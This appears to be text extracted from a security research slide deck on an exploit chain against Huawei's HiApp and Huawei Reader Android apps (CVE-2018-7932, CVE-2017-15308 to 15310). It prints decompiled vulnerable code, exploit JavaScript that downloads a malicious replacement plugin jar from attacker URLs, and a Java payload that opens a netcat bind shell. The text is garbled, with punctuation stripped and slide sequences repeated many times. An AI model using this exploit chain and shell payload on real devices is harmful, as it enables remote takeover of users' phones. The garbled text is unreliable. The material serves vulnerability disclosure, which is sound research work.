    package com.zhangyue.iReader.Plug.Service;

    import android.util.Log;
    import java.io.IOException;

    public class DocFeature {
        public DocFeature() {
            // com.zhangyue.iReader.Plug.Service.DocFeature
            Log.e("ATTACKER", "RUNNING ARBITRARY CODE");
            String cmd = "/data/data/com.huawei.hwireader/busybox nc -l -p 5555 -e /data/data/com.huawei.hwireader/busybox sh";
            try {
                Runtime.getRuntime().exec(cmd);
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    }
Demo
51
Questions
52
Credits
53
• Georgi Geshev, Rob Miller - https://labs.mwrinfosecurity.com/publications/logic-bug-hunting-in-chrome-on-android/new-blog-post
Whitepaper
54
• Full whitepaper can be found on the MWR Labs website (https://labs.mwrinfosecurity.com/publications/nhuawew-blog-post)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader – Arbitrary Delete (CVE-2017-15310)
47
    5457bea93d0548a4d84357308df45322 = ../plugins/DFService/classes.jar
    /sdcard/HWiReader/books/openfail/5457bea93d0548a4d84357308df45322   (marker tested by FILE.isExist)
